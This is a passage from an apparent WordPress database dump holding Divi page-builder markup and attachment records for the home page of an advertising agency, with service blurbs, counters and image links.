_builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 14:30:11','2020-08-07 14:30:11','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(473,1,'2020-08-07 14:32:25','2020-08-07 14:32:25','','434x434','','inherit','open','closed','','434x434','','','2020-08-07 14:32:25','2020-08-07 14:32:25','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/434x434.jpg',0,'attachment','image/jpeg',0),(474,1,'2020-08-07 14:33:08','2020-08-07 14:33:08','','217x434','','inherit','open','closed','','217x434','','','2020-08-07 14:33:08','2020-08-07 14:33:08','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg',0,'attachment','image/jpeg',0),(477,1,'2020-08-07 14:34:52','2020-08-07 14:34:52','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"banner\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/434x434.jpg\" title_text=\"434x434\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" title_text=\"217x434\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_padding=\"0px||0px|\" hover_enabled=\"0\" custom_margin=\"12px||||false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x217.jpg\" title_text=\"217x217\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x217...2.jpg\" title_text=\"217x217...2\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" 